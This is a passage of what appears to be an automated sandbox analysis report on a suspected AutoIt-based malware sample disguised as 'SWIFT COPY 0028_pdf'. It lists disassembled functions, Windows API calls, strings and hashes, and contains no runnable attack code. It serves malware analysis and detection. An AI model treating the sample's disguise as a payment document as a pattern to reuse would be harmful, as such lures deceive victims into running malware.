                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0099DE8A
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0099DE95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1946975507-0
                                                                                    • Opcode ID: 6d92f1fd594f178715f626392fc6ecd64fef426cfbd8b9622599222055c78de4
                                                                                    • Instruction ID: f67973205e0e124be52f0b1ab209572f3139668136c028f70058ed975ede077f
                                                                                    • Opcode Fuzzy Hash: 6d92f1fd594f178715f626392fc6ecd64fef426cfbd8b9622599222055c78de4
                                                                                    • Instruction Fuzzy Hash: 7DE06D31519240AEEF251F68AC4DBD83B15AF13339F00C226F66A584E1C3714581EB51
                                                                                    Function 0099B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: cee5734f240a7aa6a0bd7545e261dcc1fded4154aa4e585755f7e453de3fafb5
                                                                                    • Instruction ID: 4a3cfffcf7664d3c05dbad775a8b8d7c29d6c36c12c97f03df0e3c34f5dad2dd
                                                                                    • Opcode Fuzzy Hash: cee5734f240a7aa6a0bd7545e261dcc1fded4154aa4e585755f7e453de3fafb5
                                                                                    • Instruction Fuzzy Hash: 82E046B1515204EFDB005F70D848A2E7BA9EF4D350F12C80AFC9B8B610CB789840AF80
                                                                                    Function 0095B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0095B2DF
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 0095B2EB
                                                                                    • CloseHandle.KERNEL32(?), ref: 0095B2F4
                                                                                    • CloseHandle.KERNEL32(?), ref: 0095B2FC
                                                                                      • Part of subcall function 0095AB24: GetProcessHeap.KERNEL32(00000000,?,0095A848), ref: 0095AB2B
                                                                                      • Part of subcall function 0095AB24: HeapFree.KERNEL32(00000000), ref: 0095AB32
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: e43f5526aebb628b7ccb653e79310809da3313843ebea3a779223b768d08eb94
                                                                                    • Instruction ID: ba571c117512083dbf6849a61c36c709af96ba0fd4122a0611cf9eaa9ab69c0c
                                                                                    • Opcode Fuzzy Hash: e43f5526aebb628b7ccb653e79310809da3313843ebea3a779223b768d08eb94
                                                                                    • Instruction Fuzzy Hash: B2E0BF7A119005BBCB016B95EC0885DFB66FF893213108221F62681975CF329471FBD1
                                                                                    Function 0099B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: 8c64107e05cff75d45bc74849fdae1df8cf287b4e8e1df0c741be3a57fcfbc80
                                                                                    • Instruction ID: c400c4ff2bbf3f30e1bfb7c96b54316e756f9abb772050ceb175052dea649488
                                                                                    • Opcode Fuzzy Hash: 8c64107e05cff75d45bc74849fdae1df8cf287b4e8e1df0c741be3a57fcfbc80
                                                                                    • Instruction Fuzzy Hash: ABE046B1515200EFDB005F70D84862D7BA9EF4D350F12C809F99B8B610CB789800AF80
                                                                                    Function 0095DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0095DEAA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContainedObject
                                                                                    • String ID: AutoIt3GUI$Container
                                                                                    • API String ID: 3565006973-3941886329
                                                                                    • Opcode ID: 63315f148fee053dad77a5cf4f847e2da3d0a267fdca089f6a2ce5847dafab9d
                                                                                    • Instruction ID: 3b58feb04f87450e29057b91e0c26bc919e722502adad5c40b83bfe696e06901
                                                                                    • Opcode Fuzzy Hash: 63315f148fee053dad77a5cf4f847e2da3d0a267fdca089f6a2ce5847dafab9d
                                                                                    • Instruction Fuzzy Hash: 389137706017019FDB24CF65C888B6AB7F9AF89711F10886DFC4ACB691DB70E845CB60
                                                                                    Function 0096DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093C6F4: _wcscpy.LIBCMT ref: 0093C717
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • __wcsnicmp.LIBCMT ref: 0096DEFD
                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0096DFC6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                    • String ID: LPT
                                                                                    • API String ID: 3222508074-1350329615
                                                                                    • Opcode ID: 9233980bdfd79be60cb889909f76f3046e532c1c67932de81e94363586bbdb1c
                                                                                    • Instruction ID: 5c6ca6df37903bf00a63a72b6980eb93510591789589d29574069944ac09354f
                                                                                    • Opcode Fuzzy Hash: 9233980bdfd79be60cb889909f76f3046e532c1c67932de81e94363586bbdb1c
                                                                                    • Instruction Fuzzy Hash: 2B61AE75E04215EFCB18DF98C891EAEB7B8EF48310F10406AF556AB291DB74AE40CB94
                                                                                    Function 0093BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000), ref: 0093BCDA
                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0093BCF3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 2783356886-2766056989
                                                                                    • Opcode ID: 32ac07a45e94aef7bab6d8feb8cfc5ccebd7c7ca51d9f7045422bdcbd94aeeeb
                                                                                    • Instruction ID: 1d84b53a69d26cbfe6956f5e079edd4721ea19b40ec244d2dfc73d0210c62e73
                                                                                    • Opcode Fuzzy Hash: 32ac07a45e94aef7bab6d8feb8cfc5ccebd7c7ca51d9f7045422bdcbd94aeeeb
                                                                                    • Instruction Fuzzy Hash: C45123714197489BE320AF14DC86BAFBBE8FFD5354F41484EF1C8410A6EB7085A89B56
                                                                                    Function 0096C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 009244ED: __fread_nolock.LIBCMT ref: 0092450B
                                                                                    • _wcscmp.LIBCMT ref: 0096C65D
                                                                                    • _wcscmp.LIBCMT ref: 0096C670
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                    • String ID: FILE
                                                                                    • API String ID: 4029003684-3121273764
                                                                                    • Opcode ID: 616860b94f35962ee57f1720b73c047cb7c81abf0b96e58455bf734cf71b9abe
                                                                                    • Instruction ID: ef710314ee8849abfbf36fa518c4f57a23a52ae1b86e194702d05f3883e23a68
                                                                                    • Opcode Fuzzy Hash: 616860b94f35962ee57f1720b73c047cb7c81abf0b96e58455bf734cf71b9abe
                                                                                    • Instruction Fuzzy Hash: 4441C472B0021ABADF20ABA4EC41FEF77B9AF89714F004479F605EB191D6719A048B61
                                                                                    Function 0098A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0098A85A
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0098A86F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: '
                                                                                    • API String ID: 3850602802-1997036262
                                                                                    • Opcode ID: fcc05c68cb59fb3ee0e7702fa7fcaf083de1d7a91d3c7f8a1d5b680d129ce26f
                                                                                    • Instruction ID: 7757ca41435fc4770c61d83d1b7e925422212f739466c821f66fc6e288c0a428
                                                                                    • Opcode Fuzzy Hash: fcc05c68cb59fb3ee0e7702fa7fcaf083de1d7a91d3c7f8a1d5b680d129ce26f
                                                                                    • Instruction Fuzzy Hash: 2541F774E013099FEB14DFA8D881BDA7BB9FB08704F14006AE909EB341D774A942DFA1
                                                                                    Function 00975180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00975190
                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009751C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_memset
                                                                                    • String ID: |
                                                                                    • API String ID: 1413715105-2343686810
                                                                                    • Opcode ID: 3b0bcb08d35a5720f338c8c4bb3f420a202802d3ae172c15b478be948db7a951
                                                                                    • Instruction ID: 7394a6cb7ab92dcbb4b3adae7a878e739691597f363629a02e82957425653118
                                                                                    • Opcode Fuzzy Hash: 3b0bcb08d35a5720f338c8c4bb3f420a202802d3ae172c15b478be948db7a951
                                                                                    • Instruction Fuzzy Hash: 9E313971C00119EBCF51EFA4DC85AEE7FB9FF54710F004015F915A616AEA71A906CBA0
                                                                                    Function 0098975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 0098980E
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0098984A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyMove
                                                                                    • String ID: static
                                                                                    • API String ID: 2139405536-2160076837
                                                                                    • Opcode ID: 108abedb1901e2faecb0aff916072ef97ed992e90a1f3f211fca8b4669b0e128
                                                                                    • Instruction ID: d7008e8acd09619a07dd7f95ab9b7310d15046394b1b4821e3b7a3e9f4cae19b
                                                                                    • Opcode Fuzzy Hash: 108abedb1901e2faecb0aff916072ef97ed992e90a1f3f211fca8b4669b0e128
                                                                                    • Instruction Fuzzy Hash: AE318F71110604AEEB10AF74CC80BFB73ADFF99764F048619F8A9C7290CA31AC81DB60
                                                                                    Function 00965157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 009651C6
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00965201
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: 21119d85d3c89e945d75a7f8539494bbe619f151d9df28f363264139e99f227a
                                                                                    • Instruction ID: dd7a0d35af80cf44c26719874061fda17352eebb05e911ad8f657c91a152e459
                                                                                    • Opcode Fuzzy Hash: 21119d85d3c89e945d75a7f8539494bbe619f151d9df28f363264139e99f227a
                                                                                    • Instruction Fuzzy Hash: E331F671A00704DBEB24CF99D895BAEBBFCFF85350F160019E9A5A61A0E7709A44DB10
                                                                                    Function 0097658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __snwprintf
                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                    • API String ID: 2391506597-2584243854
                                                                                    • Opcode ID: d0bb106249916aae2fbac98230342359495509c32c5248a7825d85c72dd0618d
                                                                                    • Instruction ID: 3f3934a9ef68891aaf63eb5ae18c1ec887ad140400778497fcbfd5b0aa3c5226
                                                                                    • Opcode Fuzzy Hash: d0bb106249916aae2fbac98230342359495509c32c5248a7825d85c72dd0618d
                                                                                    • Instruction Fuzzy Hash: DA21E472A00229AFCF10EF64D882FED77B4AF84704F408469F505AB186DB70EE15CBA1
                                                                                    Function 009893CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0098945C
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00989467
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Combobox
                                                                                    • API String ID: 3850602802-2096851135
                                                                                    • Opcode ID: e8e53a409bc989c5eb57d3f398e4c49bc30fab140c953b9e62b35fc642689620
                                                                                    • Instruction ID: 3fc02d703ec4c5e15bbb81f14aa4fedc0fbbbcb2afb52eb1b6a06a5c22bff2fd
                                                                                    • Opcode Fuzzy Hash: e8e53a409bc989c5eb57d3f398e4c49bc30fab140c953b9e62b35fc642689620
                                                                                    • Instruction Fuzzy Hash: EB11B2713102197FEF11AF64DC80EBB376FEB883A4F144125F919973A0D6319C528B60
                                                                                    Function 009898FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0093D1BA
                                                                                      • Part of subcall function 0093D17C: GetStockObject.GDI32(00000011), ref: 0093D1CE
                                                                                      • Part of subcall function 0093D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0093D1D8
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00989968
                                                                                    • GetSysColor.USER32(00000012), ref: 00989982
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                    • String ID: static
                                                                                    • API String ID: 1983116058-2160076837
                                                                                    • Opcode ID: ece6da94a22bb5836f2256ac66ea88ca5895f0ee5084219a2be1b3ecfe71ae13
                                                                                    • Instruction ID: 93b70b34b3aa689661cbe3d0031aae8676ab32aeabca46fad83860ed8d1df690
                                                                                    • Opcode Fuzzy Hash: ece6da94a22bb5836f2256ac66ea88ca5895f0ee5084219a2be1b3ecfe71ae13
                                                                                    • Instruction Fuzzy Hash: 63113A72520209AFDB04EFB8CC45AFA7BA8FF49344F055619F956E3250D735E850DB50
                                                                                    Function 00989617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00989699
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009896A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                    • String ID: edit
                                                                                    • API String ID: 2978978980-2167791130
                                                                                    • Opcode ID: fc735f2d89ca3260ebdf6360043e45e8ac3bde114259b50be55cd544887dfbcd
                                                                                    • Instruction ID: d7c7e71360d5153f869a1445886812ce4dd489e2dd72cfdb94d391e9c739635c
                                                                                    • Opcode Fuzzy Hash: fc735f2d89ca3260ebdf6360043e45e8ac3bde114259b50be55cd544887dfbcd
                                                                                    • Instruction Fuzzy Hash: C1119A71510108ABEB106FA4DC80AFB3B6EEB05378F140714F925972E0E735DC50ABA0
                                                                                    Function 00965262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                    Download Yara Rule
